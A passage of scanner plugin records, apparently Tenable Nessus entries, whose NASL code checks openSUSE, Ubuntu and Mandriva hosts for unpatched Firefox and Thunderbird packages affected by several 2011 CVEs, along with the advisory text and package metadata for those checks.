script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-branding-upstream-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-buildsymbols-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-debuginfo-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-debugsource-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-devel-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-translations-common-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"MozillaFirefox-translations-other-9.0-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-js192-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-js192-debuginfo-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-buildsymbols-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-debuginfo-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-debugsource-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-devel-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-devel-debuginfo-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-gnome-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-gnome-debuginfo-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-translations-common-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"mozilla-xulrunner192-translations-other-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-js192-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-js192-debuginfo-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-debuginfo-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-debuginfo-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-common-32bit-1.9.2.25-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-other-32bit-1.9.2.25-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:37:14", "description": "Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian\nHoller, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse\nRuderman, Marcia Knous, and Rober Longson discovered several memory\nsafety issues which could possibly be exploited to crash Firefox or\nexecute arbitrary code as the user that invoked Firefox.\n(CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library\nthat could be triggered by JavaScript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could\nresult in an out-of-bounds memory access if SVG elements were removed\nduring a DOMAttrModified event handler. An attacker could potentially\nexploit this vulnerability to crash Firefox. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation\naccessKey events to detect key strokes even when JavaScript was\ndisabled. A malicious web page could potentially exploit this to trick\na user into interacting with a prompt thinking it came from the\nbrowser in a context where the user believed scripting was disabled.\n(CVE-2011-3663)\n\nIt was discovered that it was possible to crash Firefox when scaling\nan OGG <video> element to extreme sizes. (CVE-2011-3665).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2012-01-09T00:00:00", "title": "Ubuntu 11.04 / 11.10 : firefox vulnerabilities (USN-1306-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:firefox", "cpe:/o:canonical:ubuntu_linux:11.04"], "id": "UBUNTU_USN-1306-1.NASL", "href": "https://www.tenable.com/plugins/nessus/57457", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1306-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57457);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_bugtraq_id(51133, 51134, 51135, 51136, 51138);\n script_xref(name:\"USN\", value:\"1306-1\");\n\n script_name(english:\"Ubuntu 11.04 / 11.10 : firefox vulnerabilities (USN-1306-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian\nHoller, David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse\nRuderman, Marcia Knous, and Rober Longson discovered several memory\nsafety issues which could possibly be exploited to crash Firefox or\nexecute arbitrary code as the user that invoked Firefox.\n(CVE-2011-3660)\n\nAki Helin discovered a crash in the YARR regular expression library\nthat could be triggered by JavaScript in web content. (CVE-2011-3661)\n\nIt was discovered that a flaw in the Mozilla SVG implementation could\nresult in an out-of-bounds memory access if SVG elements were removed\nduring a DOMAttrModified event handler. An attacker could potentially\nexploit this vulnerability to crash Firefox. (CVE-2011-3658)\n\nMario Heiderich discovered it was possible to use SVG animation\naccessKey events to detect key strokes even when JavaScript was\ndisabled. A malicious web page could potentially exploit this to trick\na user into interacting with a prompt thinking it came from the\nbrowser in a context where the user believed scripting was disabled.\n(CVE-2011-3663)\n\nIt was discovered that it was possible to crash Firefox when scaling\nan OGG <video> element to extreme sizes. (CVE-2011-3665).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1306-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.04\", pkgname:\"firefox\", pkgver:\"9.0.1+build1-0ubuntu0.11.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"firefox\", pkgver:\"9.0.1+build1-0ubuntu0.11.10.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:53:32", "description": "Security issues were identified and fixed in mozilla firefox and\nthunderbird :\n\nThe SVG implementation in Mozilla Firefox 8.0, Thunderbird 8.0, and\nSeaMonkey 2.5 does not properly interact with DOMAttrModified event\nhandlers, which allows remote attackers to cause a denial of service\n(out-of-bounds memory access) or possibly have unspecified other\nimpact via vectors involving removal of SVG elements (CVE-2011-3658).\n\nMultiple unspecified vulnerabilities in the browser engine in Mozilla\nFirefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey\nbefore 2.6 allow remote attackers to cause a denial of service (memory\ncorruption and application crash) or possibly execute arbitrary code\nvia vectors that trigger a compartment mismatch associated with the\nnsDOMMessageEvent::GetData function, and unknown other vectors\n(CVE-2011-3660).\n\nYARR, as used in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0\nthrough 8.0, and SeaMonkey before 2.6, allows remote attackers to\ncause a denial of service (application crash) or possibly execute\narbitrary code via crafted JavaScript (CVE-2011-3661).\n\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to capture keystrokes\nentered on a web page by using SVG animation accessKey events within\nthat web page (CVE-2011-3663).\n\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to cause a denial of\nservice (application crash) or possibly have unspecified other impact\nvia an Ogg VIDEO element that is not properly handled after scaling\n(CVE-2011-3665).", "edition": 26, "published": "2012-09-06T00:00:00", "title": "Mandriva Linux Security Advisory : mozilla (MDVSA-2011:192)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2012-09-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:firefox-br", "p-cpe:/a:mandriva:linux:firefox-zh_CN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-tr", "p-cpe:/a:mandriva:linux:firefox-gd", "cpe:/o:mandriva:linux:2011", "p-cpe:/a:mandriva:linux:firefox-sv_SE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-el", "p-cpe:/a:mandriva:linux:firefox-fa", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sv_SE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-da", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-lt", "p-cpe:/a:mandriva:linux:firefox-sk", "p-cpe:/a:mandriva:linux:nsinstall", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-vi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sl", "p-cpe:/a:mandriva:linux:firefox-eu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ru", "p-cpe:/a:mandriva:linux:firefox-de", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_ES", "p-cpe:/a:mandriva:linux:firefox-id", "p-cpe:/a:mandriva:linux:firefox", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_TW", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ja", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_BR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-de", "p-cpe:/a:mandriva:linux:firefox-sl", "p-cpe:/a:mandriva:linux:firefox-es_ES", "p-cpe:/a:mandriva:linux:firefox-ta", "p-cpe:/a:mandriva:linux:firefox-el", "p-cpe:/a:mandriva:linux:firefox-nso", "p-cpe:/a:mandriva:linux:firefox-gl", "p-cpe:/a:mandriva:linux:firefox-fi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fy", "p-cpe:/a:mandriva:linux:firefox-be", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sl", "p-cpe:/a:mandriva:linux:firefox-af", "p-cpe:/a:mandriva:linux:firefox-ja", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pl", "p-cpe:/a:mandriva:linux:firefox-ku", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ar", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sv", "p-cpe:/a:mandriva:linux:firefox-is", "p-cpe:/a:mandriva:linux:firefox-lv", "p-cpe:/a:mandriva:linux:firefox-pa_IN", "p-cpe:/a:mandriva:linux:firefox-vi", "p-cpe:/a:mandriva:linux:firefox-tr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-it", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-eu", "p-cpe:/a:mandriva:linux:firefox-ga_IE", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ga", "p-cpe:/a:mandriva:linux:firefox-nl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-gd", "p-cpe:/a:mandriva:linux:firefox-lt", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ca", "p-cpe:/a:mandriva:linux:firefox-ro", "p-cpe:/a:mandriva:linux:firefox-it", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nb", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sq", "p-cpe:/a:mandriva:linux:firefox-fy", "p-cpe:/a:mandriva:linux:firefox-es_AR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-cs", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_CN", "p-cpe:/a:mandriva:linux:firefox-bn", "p-cpe:/a:mandriva:linux:firefox-sq", "p-cpe:/a:mandriva:linux:firefox-ru", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ru", "p-cpe:/a:mandriva:linux:firefox-zu", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fi", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-en_GB", "p-cpe:/a:mandriva:linux:firefox-fr", "p-cpe:/a:mandriva:linux:firefox-zh_TW", "p-cpe:/a:mandriva:linux:firefox-bs", "p-cpe:/a:mandriva:linux:firefox-kk", "p-cpe:/a:mandriva:linux:firefox-te", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-fi", "p-cpe:/a:mandriva:linux:firefox-eo", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_PT", "p-cpe:/a:mandriva:linux:firefox-mk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_AR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-gl", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-tr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-is", "p-cpe:/a:mandriva:linux:firefox-ca", "p-cpe:/a:mandriva:linux:firefox-bg", "p-cpe:/a:mandriva:linux:firefox-et", "p-cpe:/a:mandriva:linux:firefox-lg", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-uk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pl", "p-cpe:/a:mandriva:linux:firefox-or", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-it", "p-cpe:/a:mandriva:linux:firefox-si", "p-cpe:/a:mandriva:linux:firefox-pt_PT", "p-cpe:/a:mandriva:linux:firefox-ast", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-lightning", "p-cpe:/a:mandriva:linux:firefox-cy", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-he", "p-cpe:/a:mandriva:linux:firefox-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ja", "p-cpe:/a:mandriva:linux:firefox-nb_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-de", "p-cpe:/a:mandriva:linux:firefox-uk", "p-cpe:/a:mandriva:linux:firefox-hy", "p-cpe:/a:mandriva:linux:firefox-kn", "p-cpe:/a:mandriva:linux:firefox-devel", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nb_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird", "p-cpe:/a:mandriva:linux:firefox-mai", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fr", "p-cpe:/a:mandriva:linux:firefox-ar", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-si", "p-cpe:/a:mandriva:linux:firefox-nn_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-hu", "p-cpe:/a:mandriva:linux:firefox-pt_BR", "p-cpe:/a:mandriva:linux:firefox-da", "p-cpe:/a:mandriva:linux:firefox-hu", "p-cpe:/a:mandriva:linux:firefox-sr", "p-cpe:/a:mandriva:linux:firefox-pl", "p-cpe:/a:mandriva:linux:firefox-gu_IN", "p-cpe:/a:mandriva:linux:firefox-cs", "p-cpe:/a:mandriva:linux:firefox-ml", "p-cpe:/a:mandriva:linux:firefox-hi", "p-cpe:/a:mandriva:linux:firefox-th", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-et", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nl", "p-cpe:/a:mandriva:linux:firefox-hr", "p-cpe:/a:mandriva:linux:firefox-en_GB", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt_BR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nn_NO", "p-cpe:/a:mandriva:linux:firefox-mr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_TW", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ar", "p-cpe:/a:mandriva:linux:firefox-he", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ca", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-cs"], "id": "MANDRIVA_MDVSA-2011-192.NASL", "href": "https://www.tenable.com/plugins/nessus/61940", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:192. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61940);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_bugtraq_id(51133, 51134, 51135, 51136, 51138);\n script_xref(name:\"MDVSA\", value:\"2011:192\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mozilla (MDVSA-2011:192)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security issues were identified and fixed in mozilla firefox and\nthunderbird :\n\nThe SVG implementation in Mozilla Firefox 8.0, Thunderbird 8.0, and\nSeaMonkey 2.5 does not properly interact with DOMAttrModified event\nhandlers, which allows remote attackers to cause a denial of service\n(out-of-bounds memory access) or possibly have unspecified other\nimpact via vectors involving removal of SVG elements (CVE-2011-3658).\n\nMultiple unspecified vulnerabilities in the browser engine in Mozilla\nFirefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey\nbefore 2.6 allow remote attackers to cause a denial of service (memory\ncorruption and application crash) or possibly execute arbitrary code\nvia vectors that trigger a compartment mismatch associated with the\nnsDOMMessageEvent::GetData function, and unknown other vectors\n(CVE-2011-3660).\n\nYARR, as used in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0\nthrough 8.0, and SeaMonkey before 2.6, allows remote attackers to\ncause a denial of service (application crash) or possibly execute\narbitrary code via crafted JavaScript (CVE-2011-3661).\n\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to capture keystrokes\nentered on a web page by using SVG animation accessKey events within\nthat web page (CVE-2011-3663).\n\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to cause a denial of\nservice (application crash) or possibly have unspecified other impact\nvia an Ogg VIDEO element that is not properly handled after scaling\n(CVE-2011-3665).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-af\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-cy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-en_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-eo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ga_IE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hi\");\n 